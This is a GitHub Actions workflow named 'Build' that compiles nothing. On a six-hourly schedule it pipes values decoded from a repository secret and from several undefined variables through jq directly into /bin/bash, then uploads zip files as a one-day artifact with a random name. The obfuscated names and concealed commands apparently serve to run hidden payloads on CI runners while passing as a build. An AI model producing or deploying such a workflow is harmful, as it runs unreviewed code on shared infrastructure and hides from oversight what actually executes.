name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '13 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          n78976: ${{ secrets.n78976 }}
        run: |
          printf '%s' "$n78976" | jq -r .kiwd05882 | /bin/bash
          printf '%s' "$o586" | jq -r .gdp04 | /bin/bash
          printf '%s' "$sh351" | jq -r .elayb77805 | /bin/bash
          echo $nlyvi0859 | jq -r .nxrm570 | /bin/bash
          printf '%s' "$vczh7" | jq -r .nrjd2 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Nsx0XsrX
          path: "*.zip"
          retention-days: 1
